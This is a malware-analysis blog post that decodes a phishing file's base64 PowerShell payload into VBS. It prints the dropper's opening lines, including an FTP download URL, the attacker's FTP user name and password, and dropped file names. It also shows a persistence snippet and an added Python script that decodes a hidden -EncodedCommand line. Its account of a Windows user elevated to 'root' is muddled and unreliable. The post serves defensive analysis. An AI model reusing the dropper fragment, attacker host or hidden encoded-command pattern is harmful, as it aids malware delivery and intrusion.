VBS: Learn how to use this language to analyze malicious files

By Laura Cardillo and Átila Altoé: This is an analysis of a phishing file, received via email from a third-party account, whose payload decodes into the VBS language. The focus of this report is not to explain in detail how the malware itself works - but rather to present a way of identifying and decoding the payload that spreads it.

In this report, we demonstrate how the analysis was carried out, using knowledge of VBS to identify and deobfuscate the malicious code and to understand how this malware executes.

Watch the malware at work

Below is the extracted sample in question:

Figure 1: Sample file

To begin the analysis, we inspected the file in Notepad++ and noted the presence of a PowerShell command that decodes base64 strings. Unfortunately, the target of this shortcut is too long to be shown in the file's properties window. Here is the string obtained:

[Base64-encoded string omitted]

As it is humanly impossible to read this type of string, we used the CyberChef tool to decode it, which revealed the following code:

on error resume next
Dim winshell
Set winshell = WScript.CreateObject("WScript.Shell")
Timbalate = "setup.zip"
Timbalates = "setx.exe"
URL = "ftp://ftp.estamosainana.com/www/imagens.zip"
PACOTEUSER = "estamosainana"
XANPUSER = "pQNPe6v^91TX"
Dim BaganeFold
BaganeFold = winshell.expandEnvironmentStrings("%AllUsersProfile%")
DestFolder = BaganeFold & "\SetX"
Dim objWMIService, processItems, processName
processName = "wscript.exe"
Dim jordi
jordi = WScript.ScriptFullName
FORCE = "YES"
UACBYPASS = "NO"

From the start of the script, several points of attention stand out: the URL, the user name and the password of the account used in the attack, the fact that the attacker distributes the malicious files from an FTP server, and the names of the files that will be used in the infection:

Figure 2: Relevant information
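As an added example (not the authors' own tooling), here is a small Python script that performs the two steps described above: it pulls the base64 blob out of a PowerShell command line, decodes it as UTF-16LE the way PowerShell's -EncodedCommand does, and then lists the points of attention in the resulting VBS (URLs, quoted string assignments such as the FTP account, file names, environment variables, and the UACBYPASS flag). The page does not show the exact shortcut command line, so the use of -EncodedCommand is an assumption, and every host, credential and file name in the sample below is a constructed placeholder rather than an indicator from the real sample.

```python
"""Decode a PowerShell base64 payload and extract indicators from the resulting VBS.

Added example, not the authors' code. Assumes the shortcut launched PowerShell with
an -EncodedCommand blob (decoded as UTF-16LE) whose content is VBS with string
assignments of the form NAME = "value", as seen in the decoded script on the page.
"""
import base64
import re

# Constructed VBS payload mimicking the shape of the decoded script on the page.
# Host, user and password are placeholders (".invalid" TLD), not real indicators.
SAMPLE_VBS = '''on error resume next
Dim winshell
Set winshell = WScript.CreateObject("WScript.Shell")
Timbalate = "setup.zip"
Timbalates = "setx.exe"
URL = "ftp://ftp.example.invalid/www/imagens.zip"
PACOTEUSER = "placeholder_user"
XANPUSER = "placeholder_pass"
Dim BaganeFold
BaganeFold = winshell.expandEnvironmentStrings("%AllUsersProfile%")
DestFolder = BaganeFold & "\\SetX"
FORCE = "YES"
UACBYPASS = "NO"
'''


def powershell_encode(script: str) -> str:
    """Encode text the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed shortcut target, standing in for the "too long to display" string.
SAMPLE_LNK_TARGET = (
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + powershell_encode(SAMPLE_VBS)
)

# PowerShell accepts abbreviated forms of the parameter name (-e, -ec, -enc).
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.MULTILINE)
URL_RE = re.compile(r'\b(?:ftp|http|https)://[^\s"\']+', re.IGNORECASE)
ENV_RE = re.compile(r'expandEnvironmentStrings\("([^"]+)"\)', re.IGNORECASE)
FILE_RE = re.compile(r"\.(zip|exe|vbs|dll)$", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Locate the -EncodedCommand blob in a command line and decode it as UTF-16LE."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(match.group(1)).decode("utf-16-le")


def extract_indicators(vbs: str) -> dict:
    """Collect the points of attention an analyst looks for in the decoded VBS."""
    assignments = {name: value for name, value in ASSIGN_RE.findall(vbs)}
    file_names = sorted(
        v for v in assignments.values() if "://" not in v and FILE_RE.search(v)
    )
    return {
        "urls": sorted(set(URL_RE.findall(vbs))),
        "assignments": assignments,            # includes the FTP user and password
        "file_names": file_names,              # files dropped during the infection
        "env_vars": ENV_RE.findall(vbs),       # e.g. %AllUsersProfile% for the drop folder
        "uses_wscript_shell": "WScript.Shell" in vbs,
        "uac_bypass_flag": assignments.get("UACBYPASS"),
    }


def analyze(cmdline: str) -> dict:
    """Full pipeline: shortcut command line -> decoded VBS -> indicator summary."""
    return extract_indicators(decode_encoded_command(cmdline))


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LNK_TARGET).items():
        print(f"{key}: {value}")
```

Running the script on a real shortcut target only requires replacing SAMPLE_LNK_TARGET with the extracted command line; the indicator summary is what you would then feed into blocking rules (FTP host, dropped file names) and into a search of proxy or firewall logs for the URL.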

Looking more closely at the script, we also saw an attempt to create a user ("Fisga"). This user then went through a Reverseprocess step, elevating its privileges and turning it into "root".

Figure 3: Malware persistence

Finally, it should also be noted that the malware uses a specific expression at the end of the function to carry out the Persistence tactic (MITRE ATT&CK) and force the user to accept "root", as observed below:

    Else
        spin
        exec
    End If
ElseIf UACBYPASS = "YES" Then
    spin
    execc
Else
    spin
    exec
End If
End Function

Figure 4: Malware persistence

Recommendations

The first important tip to keep in mind is that most trustworthy companies don't ask for personal information or account details by email. This includes your bank, insurance companies and any company you do business with. If you receive an email asking for any kind of account information, delete it immediately and call the company to confirm that your account is safe.

  • Don't open attachments from suspicious or strange emails, especially Word, Excel, PowerPoint or PDF attachments.
  • A useful phishing prevention tip is to always avoid clicking on links embedded in emails, as these may be loaded with malware.
  • Another way to reduce your exposure to phishing messages is to use virus protection and anti-spam software.

Finally, it is essential to use a password manager for your credentials, since attackers will try any discovered credentials all over the web. One of the best features of password managers is the automatic filling in of login forms, which minimizes clicks.

References

  1. File received via honeypot; analysis carried out with open-source tools.
  2. https://www.kaspersky.com.br/resource-center/preemptive-safety/phishing-prevention-tips